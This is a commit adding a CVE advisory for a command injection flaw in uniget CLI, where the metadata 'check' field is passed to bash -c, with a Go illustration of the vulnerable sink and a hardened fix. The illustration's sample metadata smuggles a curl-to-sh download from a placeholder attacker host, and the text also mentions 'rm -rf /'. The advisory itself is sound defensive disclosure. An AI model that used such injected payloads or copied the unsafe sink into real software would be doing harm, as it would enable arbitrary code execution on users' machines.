Create CVE-2026-45152.md

This commit is contained in:
Stalin
2026-05-12 18:30:04 +05:30
committed by GitHub
parent 98140b9c79
commit cf6946769c
![CVE](https://img.shields.io/badge/CVE-2026--45152-red)
# CVE-2026-45152 — uniget Command Injection via Unsafe `tool.Check` Execution
> CVE-2026-45152 has been officially published by GitHub Security Advisories.
## Overview
A command injection vulnerability exists in uniget due to unsafe execution of the `check` field from metadata files using `/bin/bash -c`. Because the `check` field is loaded directly from untrusted JSON metadata without validation or sanitization, an attacker who can supply a metadata file can craft a `check` value that executes arbitrary shell commands on the victim's system when uniget processes it.
**CVE ID:** CVE-2026-45152
**Affected Version:** uniget CLI ≤ 0.27.0
**Fixed In:** uniget CLI 0.27.1
**Severity:** High
**CWE:** CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
---
## Description
The vulnerability exists in the `RunVersionCheck()` function, where uniget executes the `tool.Check` field using `/bin/bash -c`.
Because metadata files are parsed directly into the `Tool` structure using `json.Unmarshal()`, attacker-controlled input can reach the shell execution sink without validation.
The following vulnerable pattern was identified:
```go
// tool.Check comes straight from json.Unmarshal() of the metadata file and is interpolated into a shell command line
cmd := exec.Command("/bin/bash", "-c", tool.Check+" | tr -d '\n'")
```
Since `/bin/bash -c` interprets shell metacharacters such as `;`, `&&`, `|`, `$()`, and backticks, arbitrary shell commands may be injected and executed.
---
## Impact
An attacker who gets a victim to process malicious metadata may be able to:
* Execute arbitrary shell commands
* Exfiltrate sensitive files or environment variables
* Install malware or backdoors
* Modify or delete accessible files
* Establish persistence on the victim machine
* Compromise CI/CD environments using uniget automation
Commands execute with the privileges of the user running uniget.
---
## Preconditions
* The victim must process attacker-controlled metadata files.
* The vulnerable uniget version must invoke the `tool.Check` field through `/bin/bash -c`.
* The attacker must be able to supply malicious metadata containing shell metacharacters.
---
## Workarounds
* Upgrade to uniget CLI 0.27.1, which contains the fix.
* Until upgrading, only process metadata from sources you trust, and run uniget in an isolated or low-privilege environment whenever metadata of unknown origin is involved.
* For code that must run a check command: never pass untrusted input to `/bin/bash -c`; execute a fixed binary with fixed arguments directly (no shell), and strictly validate (allowlist) any metadata-derived field before it reaches an execution sink.
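The following Go program is an added illustration, not code from the uniget project or from the advisory. It reproduces the sink described in the Description section (the `check` field concatenated into a `bash -c` string) beside one possible hardened form of the kind the Workarounds list asks for. The `Tool` struct, its JSON field names, the sample metadata, the token allowlist and the rule that a check may only invoke the tool's own binary are all assumptions made here; they are not the fix shipped in uniget 0.27.1.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"os/exec"
	"path"
	"regexp"
	"strings"
)

// Tool is a stand-in for uniget's metadata structure; only the two fields
// needed here are modelled and their JSON names are assumed.
type Tool struct {
	Name  string `json:"name"`
	Check string `json:"check"`
}

// Constructed sample metadata: a benign check and one that smuggles a second
// command behind ';' (the host name is a reserved .invalid placeholder).
const benignMetadata = `{"name":"docker","check":"docker --version"}`
const maliciousMetadata = `{"name":"docker","check":"docker --version; curl http://attacker.invalid/x | sh"}`

// parseTool mirrors the advisory's observation that metadata is unmarshalled
// straight into the struct with no validation of the check field.
func parseTool(raw string) (Tool, error) {
	var t Tool
	if err := json.Unmarshal([]byte(raw), &t); err != nil {
		return Tool{}, err
	}
	return t, nil
}

// vulnerableArgs reproduces the sink from the advisory: the check string is
// concatenated into a single 'bash -c' argument, so every shell metacharacter
// in it is interpreted. It is returned rather than executed so it can be inspected.
func vulnerableArgs(t Tool) []string {
	return []string{"/bin/bash", "-c", t.Check + " | tr -d '\n'"}
}

// checkToken is an allowlist for one argv element: no whitespace and none of
// ; & | $ ` ( ) < > " ' \ that a shell would treat specially. Assumed policy.
var checkToken = regexp.MustCompile(`^[A-Za-z0-9._+=/:@,-]+$`)

// hardenedArgs splits the check field into argv without involving a shell,
// rejects any token outside the allowlist, and (an extra policy chosen here)
// only lets the check invoke the tool's own binary.
func hardenedArgs(t Tool) ([]string, error) {
	argv := strings.Fields(t.Check)
	if len(argv) == 0 {
		return nil, errors.New("empty check field")
	}
	for _, a := range argv {
		if !checkToken.MatchString(a) {
			return nil, fmt.Errorf("check field contains disallowed token %q", a)
		}
	}
	if path.Base(argv[0]) != t.Name {
		return nil, fmt.Errorf("check must invoke %q, got %q", t.Name, argv[0])
	}
	return argv, nil
}

// runHardened executes the validated argv directly; newline stripping is done
// in Go, which removes the reason for the "| tr -d '\n'" pipeline entirely.
func runHardened(t Tool) (string, error) {
	argv, err := hardenedArgs(t)
	if err != nil {
		return "", err
	}
	out, err := exec.Command(argv[0], argv[1:]...).Output()
	if err != nil {
		return "", err
	}
	return strings.ReplaceAll(string(out), "\n", ""), nil
}

func main() {
	for _, raw := range []string{benignMetadata, maliciousMetadata} {
		t, err := parseTool(raw)
		if err != nil {
			fmt.Println("parse error:", err)
			continue
		}
		fmt.Printf("vulnerable sink would run: %q\n", vulnerableArgs(t))
		if argv, err := hardenedArgs(t); err != nil {
			fmt.Println("hardened path rejected check:", err)
		} else {
			fmt.Printf("hardened path would exec: %q\n", argv)
		}
	}
	// End-to-end run with a binary present on any Unix host.
	out, err := runHardened(Tool{Name: "echo", Check: "echo 1.2.3"})
	fmt.Printf("runHardened output=%q err=%v\n", out, err)
}
```

The allowlist is deliberately narrow: an argument containing `;`, `|`, `&`, `$`, backticks or quotes is rejected outright rather than escaped, because escaping for `bash -c` is exactly the step that is easy to get wrong. Pinning `argv[0]` to the tool's name closes the remaining gap where a character-level allowlist would still let metadata run an arbitrary program such as `rm -rf /`.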
---
## References
* https://github.com/uniget-org/cli/security/advisories/GHSA-qqq4-5773-pmw5
---
## Discoverer
**Stalin S** ([@0x5t4l1n](https://github.com/0x5t4l1n))